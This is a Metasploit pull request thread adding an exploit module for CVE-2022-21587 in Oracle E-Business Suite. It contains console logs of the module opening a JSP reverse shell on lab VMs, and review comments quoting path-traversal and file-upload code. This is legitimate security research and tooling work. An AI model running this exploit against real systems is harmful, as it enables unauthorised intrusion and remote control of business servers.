Oracle E-Business Suite Exploit module - CVE-2022-21587 (ETR)
rapid7/metasploit-framework pull request #17624
Opened 2023-02-09 16:41 UTC by sfewer-r7

This pull request adds an exploit module for CVE-2022-21587 - An arbitrary file upload vulnerability in Oracle Web Applications Desktop Integrator, as shipped with Oracle E-Business Suite versions 12.2.3 through to 12.2.11, in order to gain remote code execution.

I have done a technical analysis of the issue here: https://attackerkb.com/topics/Bkij5kK1qK/cve-2022-21587/rapid7-analysis

## Setup

You can download a Virtual Appliance of Oracle EBS from https://edelivery.oracle.com/osdc/faces/Home.jspx if you just register an account. I tested version 12.2.10 and followed the installation steps in the documentation that comes with the appliance.

## Verification

```
msf6 > use exploit/linux/http/oracle_ebs_rce_cve_2022_21587 
[*] Using configured payload java/jsp_shell_reverse_tcp
msf6 exploit(linux/http/oracle_ebs_rce_cve_2022_21587) > show options

Module options (exploit/linux/http/oracle_ebs_rce_cve_2022_21587):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                    yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metaspl
                                       oit.html
   RPORT    8000             yes       The target port (TCP)
   SSL      false            no        Negotiate SSL/TLS for outgoing connections
   VHOST                     no        HTTP server virtual host

Payload options (java/jsp_shell_reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port
   SHELL                   no        The system shell to use.

Exploit target:

   Id  Name
   --  ----
   0   Oracle EBS on Linux

View the full module info with the info, or info -d command.

msf6 exploit(linux/http/oracle_ebs_rce_cve_2022_21587) > set LHOST 192.168.86.5
LHOST => 192.168.86.5
msf6 exploit(linux/http/oracle_ebs_rce_cve_2022_21587) > set RHOST 192.168.86.37
RHOST => 192.168.86.37
msf6 exploit(linux/http/oracle_ebs_rce_cve_2022_21587) > check
[*] 192.168.86.37:8000 - The target appears to be vulnerable.
msf6 exploit(linux/http/oracle_ebs_rce_cve_2022_21587) > exploit

[*] Started reverse TCP handler on 192.168.86.5:4444 
[*] Targeting the endpoint: /OA_HTML/BneOfflineLOVService
[*] Triggering the payload...
[+] Deleted /u01/install/APPS/fs1/FMW_Home/Oracle_EBS-app1/applications/forms/forms/saxjvm.jsp
[*] Command shell session 1 opened (192.168.86.5:4444 -> 192.168.86.37:43560) at 2023-02-09 16:17:35 +0000

id
uid=54321(oracle) gid=54321(oinstall) groups=54321(oinstall),54322(dba) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
uname -a
Linux apps 3.10.0-1160.11.1.el7.x86_64 #1 SMP Tue Dec 15 11:58:45 PST 2020 x86_64 x86_64 x86_64 GNU/Linux
exit
[*] 192.168.86.37 - Command shell session 1 closed.
msf6 exploit(linux/http/oracle_ebs_rce_cve_2022_21587) >
```

2023-02-09 17:07 UTC, adfoster-r7 commented on modules/exploits/linux/http/oracle_ebs_rce_cve_2022_21587.rb
> +    jsp_path = ''
```suggestion
    jsp_path = '../' * target['DirTraversalDepth']
```

2023-02-09 17:07 UTC, adfoster-r7 commented on modules/exploits/linux/http/oracle_ebs_rce_cve_2022_21587.rb
> +          'SideEffects' => [IOC_IN_LOGS]
Since it looks like this drops files to disk for RCE:

```suggestion
          'SideEffects' => [ARTIFACTS_ON_DISK , IOC_IN_LOGS]
```


https://docs.metasploit.com/docs/development/developing-modules/module-metadata/definition-of-module-reliability-side-effects-and-stability.html#side-effects

2023-02-09 17:11 UTC, sfewer-r7 commented on modules/exploits/linux/http/oracle_ebs_rce_cve_2022_21587.rb
> +          'SideEffects' => [IOC_IN_LOGS]
The JSP payload that is dropped to disk is subsequently removed via `register_file_for_cleanup` so AFAICT the `ARTIFACTS_ON_DISK ` side effect doesn't apply in this case?

2023-02-09 17:11 UTC, sfewer-r7 commented on modules/exploits/linux/http/oracle_ebs_rce_cve_2022_21587.rb
> +    jsp_path = ''
makes sense 👍

2023-02-09 17:25 UTC, sfewer-r7 commented on modules/exploits/linux/http/oracle_ebs_rce_cve_2022_21587.rb
> +          'SideEffects' => [IOC_IN_LOGS]
Scratch my last comment, I have verified an artifact is indeed left in a temp upload directory. I will add the side effect flag.

2023-02-09 18:44 UTC, sempervictus commented
Huh, i thought you were being kept on ice by S.H.I.E.L.D to fight Ultron when the day comes. Good to see you here sir, and as usual, your code is tons of fun for all :grin:

2023-02-10 10:35 UTC, sfewer-r7 commented on modules/exploits/linux/http/oracle_ebs_rce_cve_2022_21587.rb
> +        'uri' => "#{target_url}?bne:uueupload=true",
Good catch thanks. passing `encode_params` will escape the colon as expected.

2023-02-10 10:50 UTC, sfewer-r7 commented
Thanks @adfoster-r7 and @bcoles for those reviews 👍I will work on the required documentation.

2023-02-10 11:30 UTC, bcoles commented on modules/exploits/linux/http/oracle_ebs_rce_cve_2022_21587.rb
> +    CheckCode::Unknown
`check` method is supposed to use `vprint*` methods rather than `print` methods. `vprint` methods in `check` have also been largely phased out for new modules by instead using the `CheckCode` message.

Also, using `CheckCode::Safe` seems like a better choice in the event that version detection fails - unless there's some other way to verify that the target is EBS, in which case `CheckCode::Detected` could be used.

Also, the nested conditionals and else-after-return could be cleaned up a little:

```suggestion
    return CheckCode::Unknown unless res.code == 200

    m = res.body.match(%r{jsLibs/Common(\d+_\d+_\d+)})
    if m && (m.length == 2)
      version = Rex::Version.new(m[1].gsub('_', '.'))

      if version.between?(Rex::Version.new('12.2.3'), Rex::Version.new('12.2.11'))
        return CheckCode::Appears("EBS version #{version} is vulnerable")
      end

      return CheckCode::Safe("EBS version #{version} is not vulnerable")
    end

    CheckCode::Safe
```

2023-02-14 00:13 UTC, gwillcox-r7 commented on documentation/modules/exploit/linux/http/oracle_ebs_rce_cve_2022_21587.md
> +This module exploits CVE-2022-21587, an arbitrary file upload vulnerability in Oracle Web Applications Desktop Integrator as shipped with Oracle E-Business Suite (EBS) versions 12.2.3 through to 12.2
This file should likely be linted with `tools/dev/msftidy_docs.rb documentation/modules/exploit/linux/http/oracle_ebs_rce_cve_2022_21587.md`. There are some excessively long lines here and we are missing some of the expected titles and formatting.

2023-02-14 10:50 UTC, sfewer-r7 commented on documentation/modules/exploit/linux/http/oracle_ebs_rce_cve_2022_21587.md
> +This module exploits CVE-2022-21587, an arbitrary file upload vulnerability in Oracle Web Applications Desktop Integrator as shipped with Oracle E-Business Suite (EBS) versions 12.2.3 through to 12.2
All msftidy_docs warnings resolved via [d1463df](https://github.com/rapid7/metasploit-framework/pull/17624/commits/d1463df3ccf55e540399ae2efe56a3869362f376)

2023-02-14 15:05 UTC, gwillcox-r7 commented on documentation/modules/exploit/linux/http/oracle_ebs_rce_cve_2022_21587.md
> +This module exploits CVE-2022-21587, an arbitrary file upload vulnerability in Oracle Web Applications Desktop Integrator as shipped with Oracle E-Business Suite (EBS) versions 12.2.3 through to 12.2
Thanks @sfewer-r7 formatting looks great! Marking approved 👍

2023-02-14 16:13 UTC, sfewer-r7 commented on documentation/modules/exploit/linux/http/oracle_ebs_rce_cve_2022_21587.md
> +Oracle E-Business Suite`.
After searching for `Oracle VM Virtual Appliance for Oracle E-Business Suite`, I downloaded the `REL: Oracle VM Virtual Appliances for Oracle E-Business Suite 12.2.10` appliance package

2023-02-14 16:17 UTC, gwillcox-r7 commented on documentation/modules/exploit/linux/http/oracle_ebs_rce_cve_2022_21587.md
> +Oracle E-Business Suite`.
Ah thanks guess I got the wrong one, will download the REL version instead. Thanks for clarifying!

2023-02-16 02:35 UTC, gwillcox-r7 commented on documentation/modules/exploit/linux/http/oracle_ebs_rce_cve_2022_21587.md
> +* Follow the instructions displayed in the console to set the default passwords for the `root`
In my experience it seems you have to log into an account to change the password or be prompted to change these passwords 😕

2023-02-16 03:01 UTC, gwillcox-r7 commented on documentation/modules/exploit/linux/http/oracle_ebs_rce_cve_2022_21587.md
> +./startapps.sh
Followed these directions but when I got to startapp.sh it says the database connection could not be established, did this happen to you?

2023-02-16 09:21 UTC, sfewer-r7 commented on documentation/modules/exploit/linux/http/oracle_ebs_rce_cve_2022_21587.md
> +./startapps.sh
I didn't come across that but I did have issues after install if I changed the network adapter in the VM to be on another network, or the servers IP address changed (via dhcp) after install. I ensured I stayed on the same virtual network adapter and IP address for the VM to avoid this.

2023-02-16 14:37 UTC, gwillcox-r7 commented on documentation/modules/exploit/linux/http/oracle_ebs_rce_cve_2022_21587.md
> +./startapps.sh
We should likely document the need for a static IP address here as part of setup instructions to avoid any issues with this occurring; most applications are assumed to be okay with DHCP r.e setup so this would be a deviation from the norm.

2023-02-16 14:41 UTC, gwillcox-r7 commented on documentation/modules/exploit/linux/http/oracle_ebs_rce_cve_2022_21587.md
> +2. Set `RHOST` to the target address. The default `RPORT` is 8000.
Seems the default SSL port is 4443 so would this be something we could mention as well for those hosts that might be SSL only?

2023-02-16 14:42 UTC, gwillcox-r7 commented on modules/exploits/linux/http/oracle_ebs_rce_cve_2022_21587.rb
> +          order to gain remote code execution.
```suggestion
          order to gain remote code execution as the oracle user.
```

2023-02-16 14:54 UTC, gwillcox-r7 commented on modules/exploits/linux/http/oracle_ebs_rce_cve_2022_21587.rb
> +    m = res.body.match(%r{jsLibs/Common(\d+_\d+_\d+)})
I don't think this is a blocker for this but just wanted to note that we have been using Nokogiri to grab contents from the body of responses lately. This won't block on this PR but just wanted to raise this for awareness.

2023-02-16 14:57 UTC, gwillcox-r7 commented on modules/exploits/linux/http/oracle_ebs_rce_cve_2022_21587.rb
> +  include Msf::Exploit::Remote::HttpClient
Would be good to add `prepend Msf::Exploit::Remote::AutoCheck` here so the autocheck is run before trying to exploit.

2023-02-16 15:02 UTC, gwillcox-r7 commented on modules/exploits/linux/http/oracle_ebs_rce_cve_2022_21587.rb
> +    endpoints = %w[BneViewerXMLService BneDownloadService BneOfflineLOVService BneUploaderService]
Is it possible the software could be configured into a state where only some of these endpoints are available? It seems like we are assuming these will all be online given the `.sample` call here.

2023-02-16 15:03 UTC, gwillcox-r7 commented on modules/exploits/linux/http/oracle_ebs_rce_cve_2022_21587.rb
> +    jsp_name = Rex::Text.rand_text_alpha_lower(1..8) + '.jsp'
```suggestion
    jsp_name = Rex::Text.rand_text_alpha_lower(3..8) + '.jsp'
```

Unlikely but potential file clashes on low character count file names.

2023-02-16 15:06 UTC, gwillcox-r7 commented on modules/exploits/linux/http/oracle_ebs_rce_cve_2022_21587.rb
> +    uue_name = "#{Rex::Text.rand_text_alpha_lower(1..8)}.uue"
Small request but adding a small comment here explaining the format or just linking to a reference might help long term.

2023-02-17 12:37 UTC, sfewer-r7 commented on modules/exploits/linux/http/oracle_ebs_rce_cve_2022_21587.rb
> +    endpoints = %w[BneViewerXMLService BneDownloadService BneOfflineLOVService BneUploaderService]
All 4 endpoints are available from the same application `oacore` (as defined in the `oacore/html/WEB-INF/web.xm` file) and will be available, so I believe we can reliably pick any one of them during exploitation.

2023-02-17 13:11 UTC, sfewer-r7 commented on modules/exploits/linux/http/oracle_ebs_rce_cve_2022_21587.rb
> +    m = res.body.match(%r{jsLibs/Common(\d+_\d+_\d+)})
Thanks, I haven't changed this but good to know for future.

2023-02-17 20:29 UTC, gwillcox-r7 requested changes

2023-02-17 20:29 UTC, gwillcox-r7 commented on modules/exploits/linux/http/oracle_ebs_rce_cve_2022_21587.rb
> +    if m && (m.length == 2)
Not a huge fan of one letter variables that aren't all that descriptive. Perhaps we can rename this to `match`?

2023-02-17 20:29 UTC, gwillcox-r7 commented on modules/exploits/linux/http/oracle_ebs_rce_cve_2022_21587.rb
> +    jsp_path = '../' * target['DirTraversalDepth']
A better way to do this and avoid potential typos when updating targets might be to split on the `/` character as this will give you the number of directories to traverse.

2023-02-17 20:29 UTC, gwillcox-r7 commented on modules/exploits/linux/http/oracle_ebs_rce_cve_2022_21587.rb
> +    fail_with(Failure::UnexpectedReply, 'Failed to upload the payload') unless res && res.code == 200
Does the server respond with anything in the response body to indicate success more specifically? Otherwise any server that responds with 200 OK to this request will appear to be a successful upload.

2023-02-17 20:57 UTC, gwillcox-r7 commented on documentation/modules/exploit/linux/http/oracle_ebs_rce_cve_2022_21587.md
> +Oracle E-Business Suite`.
Fixed with https://github.com/rapid7/metasploit-framework/pull/17624/commits/38d8b7087364b8c8da6782d31f37d4a6dc0d5e31

2023-02-21 11:22 UTC, sfewer-r7 commented on modules/exploits/linux/http/oracle_ebs_rce_cve_2022_21587.rb
> +    fail_with(Failure::UnexpectedReply, 'Failed to upload the payload') unless res && res.code == 200
Not really, the `BneUploaderService` endpoint will respond with the following in the response body:

```xml
<?xml version="1.0" encoding="UTF-8"?><bne:document xmlns:bne="http://www.oracle.com/bne"><bne:message bne:type="ERROR" bne:text="Cannot be logged in as GUEST." bne:cause="" bne:action="" /></bne:document>
```

While `BneViewerXMLService`, `BneDownloadService`, `BneOfflineLOVService` endpoints all respond with a slightly different message:

```xml
<?xml version="1.0" encoding="UTF-8"?><bne:document xmlns:bne="http://www.oracle.com/bne"><bne:messages xmlns:bne="http://www.oracle.com/bne"><bne:message bne:type="ERROR" bne:text="Cannot be logged in as GUEST." bne:cause="" bne:action="" /></bne:messages></bne:document>
```

I dont believe we can infer the success of exploitation based on this any better than checking for a 200 http response code..

2023-02-21 11:30 UTC, sfewer-r7 commented on modules/exploits/linux/http/oracle_ebs_rce_cve_2022_21587.rb
> +    jsp_path = '../' * target['DirTraversalDepth']
Do you mean we add the relative path to the upload directory (relative to the `EBSBasePath`) as a target option:

```ruby
'EBSUploadPath' => 'EBSapps/appl/bne/12.0.0/upload/',
```

and then do something like: 

```ruby
jsp_path = '../' * target['EBSUploadPath'].split('/').length
```

2023-02-21 15:22 UTC, gwillcox-r7 commented on modules/exploits/linux/http/oracle_ebs_rce_cve_2022_21587.rb
> +    jsp_path = '../' * target['DirTraversalDepth']
Yep that was more or less what I was thinking of 👍

2023-02-21 15:24 UTC, gwillcox-r7 commented on modules/exploits/linux/http/oracle_ebs_rce_cve_2022_21587.rb
> +    fail_with(Failure::UnexpectedReply, 'Failed to upload the payload') unless res && res.code == 200
Could you not check for the `<bne:message bne:type="ERROR" bne:text="Cannot be logged in as GUEST." bne:cause="" bne:action="" />` line? That seems the same between all items and I think that is highly unlikely to be returned by other web servers.

2023-02-21 17:53 UTC, sfewer-r7 commented on modules/exploits/linux/http/oracle_ebs_rce_cve_2022_21587.rb
> +    fail_with(Failure::UnexpectedReply, 'Failed to upload the payload') unless res && res.code == 200
Sure thing, that seem reasonable if we want to ensure the response looks like EBS 👍

2023-02-22 01:03 UTC, gwillcox-r7 commented on modules/exploits/linux/http/oracle_ebs_rce_cve_2022_21587.rb
> +    jsp_path = '../' * target['DirTraversalDepth']
Fixed with 3854c30a1199bcf4752ae6013bcb1b77ab28af97

2023-02-22 01:03 UTC, gwillcox-r7 commented on modules/exploits/linux/http/oracle_ebs_rce_cve_2022_21587.rb
> +    fail_with(Failure::UnexpectedReply, 'Failed to upload the payload') unless res && res.code == 200
Fixed with 3854c30a1199bcf4752ae6013bcb1b77ab28af97

2023-02-22 01:04 UTC, gwillcox-r7 commented
This looks good to land minus the one documentation comment I left earlier here; thanks for making these updates @sfewer-r7!

2023-02-22 09:44 UTC, sfewer-r7 commented on documentation/modules/exploit/linux/http/oracle_ebs_rce_cve_2022_21587.md
> +* Follow the instructions displayed in the console to set the default passwords for the `root`
I added some extra clarity for this in commit 690abcf

2023-02-22 15:13 UTC, gwillcox-r7 commented on documentation/modules/exploit/linux/http/oracle_ebs_rce_cve_2022_21587.md
> +* Follow the instructions displayed in the console to set the default passwords for the `root`
Thanks @sfewer-r7 changes look great, much appreciated! Marking resolved.

2023-02-22 15:13 UTC, gwillcox-r7 approved these changes

2023-02-22 15:14 UTC, gwillcox-r7 commented
Alright should be good to go I'm just trying to get a testing machine up and running but its proving a little hard with the size of the machine and some data integrity issues I had, so bear with me whilst I get that sorted out.

2023-02-28 21:53 UTC, jheysel-r7 commented
@sfewer-r7 thanks for the awesome module, and to all who reviewed. Worked like a charm 🚀 
```
msf6 > use linux/http/oracle_ebs_rce_cve_2022_21587
[*] Using configured payload java/jsp_shell_reverse_tcp
msf6 exploit(linux/http/oracle_ebs_rce_cve_2022_21587) > set rhosts 192.168.100.180
rhosts => 192.168.100.180
msf6 exploit(linux/http/oracle_ebs_rce_cve_2022_21587) > set lhost 192.168.100.78
lhost => 192.168.100.78
msf6 exploit(linux/http/oracle_ebs_rce_cve_2022_21587) > run

[*] Started reverse TCP handler on 192.168.100.78:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Oracle EBS version 12.2.10 detected.
[*] Targeting the endpoint: /OA_HTML/BneOfflineLOVService
[*] Triggering the payload...
[+] Deleted /u01/install/APPS/fs1/FMW_Home/Oracle_EBS-app1/applications/forms/forms/ppir.jsp
[*] Command shell session 1 opened (192.168.100.78:4444 -> 192.168.100.180:37584) at 2023-02-28 16:34:44 -0500

id
uid=54321(oracle) gid=54321(oinstall) groups=54321(oinstall),54322(dba) context=system_u:system_r:initrc_t:s0
uname -a
Linux apps 5.4.17-2036.101.2.el7uek.x86_64 #2 SMP Wed Dec 2 17:56:16 PST 2020 x86_64 x86_64 x86_64 GNU/Linux
``

2023-02-28 22:14 UTC, merged

2023-02-28 22:45 UTC, jheysel-r7 commented
# Release Notes
This pull request adds an exploit module for an arbitrary file upload vulnerability in Oracle Web Applications Desktop Integrator, as shipped with Oracle E-Business Suite versions 12.2.3 through to 12.2.11, which results in remote code execution.

2023-03-01 08:57 UTC, sfewer-r7 commented
Awesome, thanks all for the review, testing and merge :)